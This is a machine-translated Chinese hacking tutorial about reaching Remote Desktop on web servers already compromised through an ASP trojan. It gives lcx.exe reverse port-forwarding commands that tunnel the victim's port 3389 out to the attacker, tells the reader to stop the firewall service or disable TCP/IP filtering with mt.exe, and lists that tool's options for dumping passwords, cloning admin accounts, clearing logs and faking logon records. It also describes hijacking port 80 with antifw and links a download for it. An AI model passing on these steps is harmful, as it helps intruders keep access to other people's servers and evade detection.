WEB penetration is not capable of remote connection after 3389

There are several reasons why I cannot connect to the server after 3389. I will summarize the following: Wow, several servers mentioned in the past few days are like TM,
 
Cause 1: The Remote Desktop port is changed. 2. The opposite server is in the intranet. 3. Firewall interception. 4. TCP/IP security restrictions.
 
Now, let's take a look at the solution one by one (some references ):
 
Solution for changing the Remote Desktop Port:
 
Currently, asp trojan has the function of detecting servers. When the permissions are okay, you can directly view the Terminal Service port, or you can view the registry or obtain the Remote Desktop port, asp permissions are not good. When aspx is supported, you can change aspx to view the registry.
 
Solution:
 
In this situation, we can use lcxto do port forwarding, And we can download lcx.exe without knowing it. "I will not download it.
 
Usage:
 
1. Upload lcx.exe to the executable directory of the target server
 
2. start lcx.exe listening, command:
Lcx.exe-listen 1988 4567 // listen to port 1988 and forward it to port 4567
 
Run on the target host:
Format:
Lcx.exe-slave your IP address the port you listen
Example: lcx.exe-slave 192.168.86.1 1988 192.168.86.3 3389
 
3. Local Link: 127.0.0.1: 1988
 
OK, it is a little troublesome, but it still works very well. If you are also an intranet, you just need to perform port ing and map it to the forwarded port. Wow.
 
4. Firewall interception solution:
 
Generally, try port forwarding first, or use LCX,
 
Usage:
 
Lcx.exe-slave your IP address the port you listen to the port of the meat Server IP www.2cto.com to forward the target host port
Example: lcx.exe-slave 192.168.86.1 1988 192.168.86.3 3389
Then the local connection is 127.0.0.1: 1988.
 
If not .. If the web is the SYSTEM permission, it is okay to stop the Firewall Service directly.
 
5. TCP/IP security policy restrictions.
 
This solution is a bit more complicated. You can use MT. EXE to disable the policy,
 
Usage:
 
1. Upload mt.exe to the executable directory of the target server
 
2. Execute the command: mt.exe-filter off
 
In this way, the TCP/IP restriction is disabled.
 
Option:
-Filter-change the Starting Status of the TCP/IP filter
-Addport-Add a port to the permitted list of the filter
-Setport-set the port as the permitted list of the filter
-Nicinfo-list TCP/IP Interface Information
-Pslist-list active processes
-Pskill-specify the process for Anti-Virus
-Dlllist-list the DLL of a specified process
-Sysinfo-list system information
-Shutdown-Shut down the system
-Reboot-restart the system
-Poweroff-power off
-Logoff-deregistering the current user session
-Chkts-check terminal service information
-Setupts-install Terminal Services
-Remts-uninstall Terminal Services
-Chgtsp-reset the Terminal Service port
-Clog-clear system logs
-Enumsrv-list all services
-Querysrv-list details of a specified service
-Instsrv-install a service
-Modify SRV-Modify service configuration
-Remsrv-Uninstall a specified service
-Startsrv-start a specified service
-Stopsrv-stop a specified service
-Netget-download from http/ftp
-Redirect-port redirection
-Chkuser-list all accounts, sid, and anti-clone
-Clone admin to target
-Never-set the account to appear to have never logged on
-Killuser-delete an account or even "guest ".
-Su-run the process with the Local_System permission
-Findpass-display the passwords of all logged-on users
-Netstat-list TCP connections
-Killtcp-killing TCP connections
-Psport-port ing to process
-Touch-set the date and time of the file to the specified value
-Secdel-safely erase the space occupied by files or directories
-Regshell-enter a console Registry Editor
-Chkdll-check the gina dll Backdoor
 
The above is just a method. Let's say it's a good method. The success rate is very high. Wow.
 
Use antifw.exe,
 
Usage:
 
Enter
 
Antifw-s run program stop iis change 3389 to 80
Antifw-l closes the program. Restore iis
 
When you connect to port 80, it will be OK! The success rate is relatively high. But then his website won't be accessible...
 
It's okay. When we go up, we can quickly analyze the cause, remove the limit, and then restore port 80 to wow...
 
I have a network disk and I want to paste it (I don't need to unbind it if I worry about it)
 
Http://115.com/file/anex5w5q #
 
Antif511zip
 
There are several other solutions, but they are a little tricky. I don't want to talk much about them. I wish you a good distance...
 
By: Seay
Blog: http://seay.sinaapp.com